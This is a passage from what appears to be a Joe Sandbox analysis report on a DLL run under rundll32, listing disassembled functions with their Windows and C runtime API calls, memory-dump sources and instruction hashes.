                                                                                                                                                            • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                                            • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                                                            • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                                                            • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                            • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                                            • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                                                            • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                                                            • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                                                            • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3058430110-0
                                                                                                                                                            • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                                            • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                                                            • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                                                            • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetDC.USER32(?), ref: 1002658E
                                                                                                                                                            • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3511876931-0
                                                                                                                                                            • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                                            • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                                                            • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                                                            • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __msize_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1288803200-0
                                                                                                                                                            • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                                            • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                                                            • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                                                            • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                                                            • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePeek$H_prolog3
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3998274959-0
                                                                                                                                                            • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                                            • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                                                            • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                                                            • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                                                              • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                                                              • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                                                            • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1532457625-0
                                                                                                                                                            • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                                            • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                                                            • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                                                            • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10022C16 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                                                              • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                                                            • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                                                            • _strtol.LIBCMT ref: 10022CB5
                                                                                                                                                            • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                                                              • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4211061542-0
                                                                                                                                                            • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                                            • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                                                            • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                                                            • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10027B2E Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3253174383-0
                                                                                                                                                            • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                                            • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                                                            • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                                                            • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 100266ED Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2161412305-0
                                                                                                                                                            • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                                            • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                                                            • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                                                            • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001FCED Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                                                              • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                                                              • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                                                            • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1615547351-0
                                                                                                                                                            • Opcode ID: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                                            • Instruction ID: 02293aacd12bdd5b71dc2e1620005b8d21a8bb506af1f41bdeabb16afe14deca
                                                                                                                                                            • Opcode Fuzzy Hash: 7e5ced4c9e2eb0c702982f1f92c1bbdd58b98f1cb347c47c5882039fca099ce7
                                                                                                                                                            • Instruction Fuzzy Hash: C0118675504249FFDB05DFA4DC819BE3BA9FB08350F118929F915CE2A1E631DA50C754
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10017081 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                            • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                                            • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                                                            • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                                                            • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                                                              • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                                                            • __strdup.LIBCMT ref: 1001514C
                                                                                                                                                            • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4206445780-0
                                                                                                                                                            • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                                            • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                                                            • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                                                            • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                                                            • _swprintf.LIBCMT ref: 10017768
                                                                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4210924919-0
                                                                                                                                                            • Opcode ID: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                                            • Instruction ID: e9188d0bda7618ab121d067f9e2349c71729dbb6fdaec1ca83b1d39ed15240a7
                                                                                                                                                            • Opcode Fuzzy Hash: 3276be8801f00fc95fb59eac867b2e4799b3078c36edba842ee4648e314c5080
                                                                                                                                                            • Instruction Fuzzy Hash: A901C072500219FBEB00DF648D85FAFB3BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 10017C8A
